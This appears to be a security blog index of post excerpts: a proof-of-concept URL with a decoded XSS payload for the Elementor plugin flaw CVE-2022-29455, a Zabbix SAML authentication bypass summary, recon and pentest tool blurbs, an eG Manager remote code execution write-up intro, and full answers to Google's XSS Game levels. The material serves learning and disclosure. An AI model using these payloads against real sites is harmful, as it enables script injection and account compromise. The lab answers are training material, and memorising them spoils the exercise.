CVE 2022-29455 is still affecting millions of WordPress sites

– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions.  This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin.  Reference:    – https://nvd.nist.gov/vuln/detail/CVE-2022-29455    – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor    – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from Base64: https://example.com/#elementor-action:action=lightbox&settings={“type”:”video”,”url”:”http://”,”videoType”:”hosted”,”videoParams”:{“onerror”:”alert(document.domain)”}} Impact: XSS can cause…

Zabbix – SAML SSO Authentication Bypass

In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: usage refrences https://nvd.nist.gov/vuln/detail/CVE-2022-23131 https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage https://github.com/Mr-xn/cve-2022-23131 https://github.com/projectdiscovery/nuclei-templates

The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not

You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and can fetch the endpoints from web applications to do further exploitation, don’t believe me xD You will after Travelling from TheTimeMachine, PS Doesn’t work offline you need internet…

The Most used Chrome Extensions are Used For Penetration Testing.

Mostly, penetration testing can use the extensions for the purpose to locate the broken links and inform the client, and these extensions also help to determine whether a target website contains vulnerabilities that can lead to adversarial exploitations and sensitive information theft. Here are the different chrome extensions that are used by penetration testing…. Wappalyzer…

eG Manager v7.1.2: Improper Access Control lead to Remote Code Execution (CVE-2020-8591)

Improper Access Control to Remote Code Execution (CVE-2020-8591)

In this post. I will explain how I hacked a whole system by exploiting improper access control vulnerability in the popular java-based MaaS software “eG Manager” and how I can escalated it to execute code remotely.

Impact

The Improper Access Control weakness describes a case where software fails to restrict access to an object properly. A malicious user can compromise security of the software and perform certain unauthorized actions by gaining elevated privileges, reading otherwise restricted information, executing commands, bypassing implemented security mechanisms, etc.

Google XSS Game

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Testing for XSS (Cross Site Scripting)

Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So first, For testing XSS you…